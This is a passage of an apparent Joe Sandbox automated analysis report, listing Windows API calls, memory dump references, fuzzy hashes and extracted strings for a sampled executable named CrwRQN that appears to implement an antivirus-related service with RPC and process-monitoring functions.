                                    • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                    • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                    • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                    • String ID:
                                    • API String ID: 1232609184-0
                                    • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                    • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                    • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                    • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                    • String ID: H
                                    • API String ID: 2107338056-2852464175
                                    • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                    • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                    • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                    • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                    • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                    • API String ID: 1322048431-2685357988
                                    • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                    • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                    • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                    • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                    • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                    • API String ID: 2984211723-3002863673
                                    • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                    • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                    • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                    • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                    • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                    • API String ID: 678758403-4129911376
                                    • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                    • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                    • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                    • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen
                                    • String ID:
                                    • API String ID: 3424473247-0
                                    • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                    • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                    • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                    • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                    • String ID: bad exception$csm$csm$csm
                                    • API String ID: 3766904988-820278400
                                    • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                    • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                    • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                    • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                    • String ID:
                                    • API String ID: 2707001247-0
                                    • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                    • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                    • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                    • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 849930591-393685449
                                    • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                    • Instruction ID: f190c909e49ca7fecd17968184502092b31e7957061d1eb9ad01b3660a67708a
                                    • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                    • Instruction Fuzzy Hash: ADD1A232B08B4186EB20DF2695443BD77A0FB45BA8F9041B6DE4D57B6ADF38E5A1C700
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                    • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                    • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                    • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                    • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                    • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                    • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressFreeLibraryProc
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 3013587201-537541572
                                    • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                    • Instruction ID: b1cdebca0d4c6bf9805e57c294a271188fb2d99da42f4878292d1f1d6901bd19
                                    • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                    • Instruction Fuzzy Hash: D641EF21B19E0251EB168B17A8106BA2391BF45FB0F9945F7DD0E877A8EF3CE4269300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                    • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                    • API String ID: 1119674940-1966266597
                                    • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                    • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                    • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                    • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen$ComputerName
                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                    • API String ID: 3702919091-996641649
                                    • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                    • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                    • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                    • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$Info
                                    • String ID:
                                    • API String ID: 1775632426-0
                                    • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                    • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                    • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                    • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                    APIs
                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71B1
                                    • GetLastError.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71BF
                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C71E9
                                    • FreeLibrary.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C7257
                                    • GetProcAddress.KERNEL32(?,?,?,00007FFE1A4C72EB,?,?,?,00007FFE1A4C3EC0,?,?,?,?,00007FFE1A4C3CFD), ref: 00007FFE1A4C7263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                    • String ID: api-ms-
                                    • API String ID: 2559590344-2084034818
                                    • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                    • Instruction ID: ba7f82d7a17f56e5e61b5e0c7315eaaafb50787063e246953340c62ac4f37dfa
                                    • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                    • Instruction Fuzzy Hash: AE31D421B1AE4292EF16DB53A4005796398BF49FB0F9905B6ED1D07768FF3CE4618300
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Value$ErrorLast
                                    • String ID:
                                    • API String ID: 2506987500-0
                                    • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                    • Instruction ID: bc3562d6e258100f8ed0ab14dc15090a9c1723719e6599be68fcd5f4a114c96e
                                    • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                    • Instruction Fuzzy Hash: A421B028B0CE4259F755A333555113921419F44FB0F9007FAE97E476FFEE6CB4228200
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                    • String ID: CONOUT$
                                    • API String ID: 3230265001-3130406586
                                    • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                    • Instruction ID: b28350873748554a467716b691259b46a0a5d3e497fe8a48522267c7f72d9d48
                                    • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                    • Instruction Fuzzy Hash: 4D114C31B18E4186E7508B53F84433962A0BBA8FF4F0442B6EA5E87BA4DF7CD5648744
                                    APIs
                                    • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                    • CreateEventW.KERNEL32 ref: 00000001400012C0
                                      • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                      • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                      • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                      • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                      • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                      • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                      • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                      • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                      • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                      • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                      • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                    • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                    • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                      • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                      • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                      • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                      • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
